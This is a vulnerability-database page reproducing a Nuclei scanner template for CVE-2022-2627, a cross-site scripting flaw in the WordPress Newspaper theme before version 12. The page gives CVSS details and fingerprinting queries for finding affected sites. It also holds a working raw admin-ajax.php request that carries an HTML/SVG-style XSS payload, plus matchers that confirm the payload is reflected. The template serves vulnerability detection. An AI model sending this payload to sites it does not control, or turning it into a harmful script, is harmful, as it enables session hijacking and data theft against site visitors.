Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-2627
HistoryNov 18, 2022 - 11:06 p.m.

WordPress Newspaper < 12 - Cross-Site Scripting

2022-11-1823:06:23
ProjectDiscovery
github.com
42
cve2022 xss wordpress wp-theme newspaper wpscan tagdiv crossorigin-scripting data-theft session-hijacking

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

43.6%

WordPress Newspaper theme before 12 is susceptible to cross-site scripting. The does not sanitize a parameter before outputting it back in an HTML attribute via an AJAX action. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.
id: CVE-2022-2627

info:
  name: WordPress Newspaper < 12 - Cross-Site Scripting
  author: ramondunker,c4sper0
  severity: medium
  description: |
    WordPress Newspaper theme before 12 is susceptible to cross-site scripting. The does not sanitize a parameter before outputting it back in an HTML attribute via an AJAX action. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: Fixed in version 12
  reference:
    - https://wpscan.com/vulnerability/038327d0-568f-4011-9b7e-3da39e8b6aea
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2627
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-2627
    cwe-id: CWE-79
    epss-score: 0.00106
    epss-percentile: 0.43227
    cpe: cpe:2.3:a:tagdiv:newspaper:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: tagdiv
    product: newspaper
    framework: wordpress
    shodan-query: http.html:/wp-content/themes/newspaper
    fofa-query: body=/wp-content/themes/newspaper
    publicwww-query:
      - "/wp-content/themes/Newspaper"
      - /wp-content/themes/newspaper
  tags: cve2022,cve,xss,wordpress,wp,wp-theme,newspaper,wpscan,tagdiv

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=td_ajax_loop&loopState[moduleId]={{xss_payload}}&loopState[server_reply_html_data]=

    payloads:
      xss_payload:
        - "--><form><math><img+onerror=alert(document.domain)+src=1><mtext></form>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - <form><math><img onerror=alert(document.domain) src=1><mtext>
          - td-block-
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a004730450220565e8b3c99e32a3cc6ebe20cccd8a43480e6fa221944a6129a165ed140cf4255022100c54ba1fbccce38a1279807cd819946d7ad4851e797aafb4b36fc691d48657069:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

43.6%